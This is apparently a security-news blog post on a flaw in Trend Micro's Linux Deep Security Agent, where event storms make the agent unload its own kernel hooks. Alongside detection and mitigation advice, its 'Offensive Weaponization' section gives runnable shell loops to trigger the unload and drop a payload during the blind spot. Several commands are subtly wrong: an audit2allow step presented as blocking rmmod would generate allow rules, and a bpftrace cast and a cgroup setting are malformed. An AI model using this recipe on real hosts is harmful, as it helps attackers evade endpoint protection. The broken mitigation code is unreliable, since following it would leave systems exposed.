Listen to this Post
Introduction:
A newly discovered design flaw in Trend Micro’s Deep Security Agent for Linux enables a local, unprivileged attacker to create repeatable blind spots in endpoint protection by forcing the agent to unload its own kernel monitoring modules. The vulnerability lies in how the `ds_am.init` component handles high-frequency local event loads, intentionally invoking `rmmod` on the `bmhook` and `tmhook` kernel modules—rather than simply throttling telemetry—which creates a temporary window of 1–2 seconds where `tmhook` is completely absent and up to 20 seconds where behavior monitoring is degraded.
Learning Objectives:
– Understand how an unprivileged local attacker can trigger a repeatable security bypass by generating high-volume filesystem and process events.
– Learn to detect the protection gap using Linux kernel auditing tools, `bpftrace`, and Trend Micro’s own CLI.
– Master offensive and defensive techniques, including forcing module reloads, detecting `rmmod` invocations, and implementing mitigation strategies.
You Should Know:
1. Anatomy of the Bypass: Forcing `bmhook` and `tmhook` to Unload
The vulnerability stems from how Deep Security Agent’s behavior-monitoring pipeline responds to sustained local activity. When a local process generates a high rate of filesystem operations (create, write, truncate, rename, symlink) and process events (fork, exit), the `ds_am.init` component does not simply throttle—it deliberately unloads the monitoring modules. This creates a repeatable protection gap rather than a one‑off stability glitch.
Step‑by‑step guide to reproducing (research/authorized testing only):
1. Identify vulnerable versions: The issue affects agents where `tmhook` version is 1.2.2129 and `bmhook` version is 1.2.2120.2129, observed on Ubuntu with kernel 6.8.0.
2. Monitor kernel messages in real time: Before triggering the event storm, open a terminal and run:
sudo dmesg -w | grep -E "livepatch|tmhook|bmhook|rmmod"
This captures the livepatch transition messages when the agent unloads modules.
3. Generate a high-volume event storm (Proof-of-Concept): A simple C program that repeatedly creates, writes, truncates, renames, and deletes files in a loop, while also forking and exiting child processes, can trigger the bypass. The original research used a C‑based PoC that hammered file operations and `fork`/`exit` loops.
4. Observe the unload pattern: In `dmesg`, you will see:
livepatch: 'tmhook': starting unpatching transition livepatch: signaling remaining tasks livepatch: 'tmhook': unpatching complete tmhook: tmhook 1.2.2129 unloaded
Followed later by:
livepatch: enabling patch 'tmhook' livepatch: 'tmhook': patching complete tmhook: tmhook 1.2.2129 loaded
The entire livepatch transition takes roughly 20 seconds, with a 1–2 second window where `tmhook` is completely absent from the kernel.
5. Detect the bypass window with `bpftrace`: To confirm deliberate unloading via `rmmod`, attach a `bpftrace` script:
sudo bpftrace -e 'tracepoint:syscalls:sys_enter_execve /comm == "ds_am.init"/ { printf("ds_am.init executing: %s\n", str(args->filename)); }'
The output will show `ds_am.init` spawning `/usr/sbin/rmmod` to unload `bmhook` and `tmhook`.
6. Attempt to write a normally blocked artifact during the window: While the modules are unloaded, attempt to write a test malware signature or download a known indicator to disk. In the baseline state, the agent blocks this; during the reload window, the artifact successfully lands and persists.
What this does: The bypass creates a temporary but repeatable blind spot in endpoint protection. An attacker with local unprivileged access can stage malware, unpack payloads, or execute post‑exploitation components that would normally be blocked.
2. Offensive Weaponization: From Local Foothold to Payload Landing
For an attacker who already has a low-privileged foothold on a Linux system protected by Trend Micro Deep Security Agent, this vulnerability provides a reliable method to drop tooling or malware that would otherwise be immediately blocked. The key is timing: the attacker must synchronize the payload writing or execution with the 1–2 second window when `tmhook` is absent.
Step‑by‑step guide to weaponization (authorized testing only):
1. Enumerate the environment: Check if the Trend Micro agent is running and identify the module versions:
lsmod | grep -E "tmhook|bmhook" modinfo tmhook | grep version ps aux | grep ds_am.init
2. Trigger the event storm from a low-privileged user: The original research showed that a local unprivileged process can generate enough pressure. A simple shell loop may suffice:
Create a high-volume filesystem event storm
for i in {1..100000}; do
touch /tmp/test_$i
echo "data" > /tmp/test_$i
rm -f /tmp/test_$i
( : ) &
done
For a more reliable trigger, a C program using `fork()` in a tight loop combined with file operations is more effective.
3. Monitor for module disappearance: In a separate terminal, poll for `tmhook` presence:
while true; do lsmod | grep tmhook > /dev/null && echo "tmhook present" || echo "tmhook GONE"; sleep 0.1; done
This will show the 1–2 second gap.
4. Simultaneously write the payload: In a third terminal, attempt to write a test artifact repeatedly:
while true; do echo "malicious_payload" > /tmp/evasion_test.txt; done
During the gap, the write succeeds; outside the gap, it is blocked.
5. Verify persistence: After the modules reload, check if the artifact remains:
ls -la /tmp/evasion_test.txt
If the file exists, the bypass was successful.
3. Detection and Monitoring: Catching the Unload Event
Defenders can detect this bypass by monitoring for `rmmod` executions against the `tmhook` and `bmhook` modules, as well as by observing livepatch transition messages in kernel logs.
Step‑by‑step guide to detection:
1. Monitor for `rmmod` invocations using `auditd`:
sudo auditctl -a always,exit -S execve -F path=/usr/sbin/rmmod -k rmmod_event
Then search the audit log:
sudo ausearch -k rmmod_event
2. Create a systemd service to alert on module unload: Write a script that checks `lsmod` every second and logs if `tmhook` or `bmhook` disappear:
!/bin/bash while true; do if ! lsmod | grep -q tmhook; then logger "ALERT: tmhook module unloaded - potential bypass attempt" fi sleep 1 done
3. Use `bpftrace` to trace `module_free` events: This confirms real module removal rather than a cosmetic state change:
sudo bpftrace -e 'kprobe:module_free { printf("Module %s freed\n", (char )arg0); }'
4. Set up SIEM alerting on `dmesg` patterns: Forward kernel logs to a SIEM and create alerts for the string `”livepatch: ‘tmhook’: unpatching complete”` followed within 30 seconds by `”livepatch: ‘tmhook’: patching complete”`.
5. Use Trend Micro’s own CLI to check agent health: The Deep Security Agent CLI can report module status:
/opt/ds_agent/dsa_control -r dsa_query -c
4. Mitigation and Hardening: Closing the Gap Until a Patch is Released
As of June 3, 2026, Trend Micro has not assigned a CVE or released a confirmed fix timeline, despite the finding being reported on February 6, 2026. Until an official patch is available, defenders must implement compensating controls.
Step‑by‑step guide to mitigation:
1. Limit local unprivileged process event rates using `cgroups`: Create a cgroup that caps fork and file operation rates for untrusted workloads:
sudo mkdir /sys/fs/cgroup/system.slice/restricted echo 1000 > /sys/fs/cgroup/system.slice/restricted/pids.max echo 10000 > /sys/fs/cgroup/system.slice/restricted/io.max
Then place untrusted processes into this cgroup.
2. Enforce SELinux or AppArmor policies to restrict `rmmod`: Create a custom SELinux policy that prevents `ds_am.init` from executing `rmmod`:
sudo ausearch -c ds_am.init --raw | audit2allow -M my-ds_am-init sudo semodule -i my-ds_am-init.pp
3. Harden the kernel module loading interface: Restrict `rmmod` to root only (it already requires root, but ensure no sudoers overrides):
sudo chmod 750 /usr/sbin/rmmod
4. Deploy a lightweight eBPF-based monitor that hooks `module_free` and alerts immediately when `tmhook` or `bmhook` are unloaded.
5. Isolate critical workloads from untrusted local users using virtualization or containers. The bypass requires local access, so preventing local footholds remains the primary defense.
5. Broader Context: EDR Kernel‑Module Weaknesses
This vulnerability is not an isolated incident. Security researchers have demonstrated that many Linux EDRs rely on Loadable Kernel Modules (LKMs) for syscall hooking, and weaknesses in module cleanup and reload logic are increasingly being exploited. The `UnhookingLinuxEdr` project, for instance, has shown how to manipulate the `cleanup_module` function of kernel modules to disable monitoring. Additionally, tools like `RingReaper` use `io_uring` to bypass traditional syscall hooks entirely. The Trend Micro flaw adds a new dimension: forcing the EDR to unload itself through resource exhaustion.
What Undercode Say:
– Key Takeaway 1: A local unprivileged attacker can create a repeatable 1–2 second window where `tmhook` (the livepatch syscall hook) is completely absent, allowing malicious files or processes that would normally be blocked to land successfully.
– Key Takeaway 2: The vulnerability is not a crash but an intentional recovery path in `ds_am.init` that calls `rmmod` when overwhelmed—this design choice turns a performance protection mechanism into a security gap.
– Analysis: While the blast radius is limited to systems where an attacker already has local access, the repeatability of the bypass makes it highly useful for post‑exploitation. Attackers can now reliably stage tooling without fear of immediate EDR blocking. The absence of a CVE or patch timeline from Trend Micro as of early June 2026 is concerning, especially given that the finding was reported in February. Organizations should prioritize detecting `rmmod` executions against these modules and consider moving critical Linux workloads to alternative endpoint protection solutions or implementing strict eBPF-based monitoring as a compensating control. The vulnerability also highlights a broader industry trend: EDRs that rely on kernel modules must carefully audit their resource‑management logic under adversarial conditions.
Prediction:
– -1 This vulnerability undermines trust in kernel‑based EDRs for Linux, as it demonstrates that even market‑leading solutions can be forced into self‑induced blind spots through ordinary local activity.
– -1 Expect exploit code to be weaponized in post‑exploitation frameworks (e.g., Metasploit, Cobalt Strike) within the next 3–6 months, targeting Linux environments in data centers and cloud workloads.
– -1 Regulators and compliance frameworks (PCI-DSS, HIPAA, FedRAMP) may require compensating controls for any Linux endpoint protection that uses LKM syscall hooks, increasing operational costs.
– +1 The disclosure will drive innovation in eBPF-based monitoring, which is more resilient to this class of module‑unloading attacks because eBPF programs are verified and run in a safer kernel context.
– -1 If Trend Micro does not release a patch quickly, organizations may migrate away from Deep Security Agent, disrupting the vendor’s market share in the Linux endpoint protection space.
– +1 Blue teams will develop new detection rules for high‑rate local event storms combined with `rmmod` executions, improving overall Linux threat hunting capabilities.
▶️ Related Video (70% Match):
🎯Let’s Practice For Free:
🎓 Live Courses & Certifications:
[Join Undercode Academy for Verified Certifications](https://undercode.co.uk/certifications/)
🚀 Request a Custom Project:
Secure, high-velocity infrastructure and disruptive technological engineering. Contact our engineering team for high-tier development and proprietary systems:
[[email protected]](mailto:[email protected])
💎 Smart Architecture | 🛡️ Secure by Design | ⭐ Trusted by Thousands
IT/Security Reporter URL:
Reported By: [Linux Cybersecuritnews](https://www.linkedin.com/posts/linux-cybersecuritnews-share-7468644005774262273-27_2/) – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅
🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]
[💬 Whatsapp](https://undercode.help/whatsapp) | [💬 Telegram](https://t.me/UndercodeCommunity)
📢 Follow UndercodeTesting & Stay Tuned:
[𝕏 formerly Twitter 🐦](https://x.com/undercodeupdate) | [@ Threads](https://www.threads.net/@undercodetesting) | [🔗 Linkedin](https://www.linkedin.com/company/undercodetesting/) | [🦋BlueSky](https://bsky.app/profile/undercode.bsky.social)
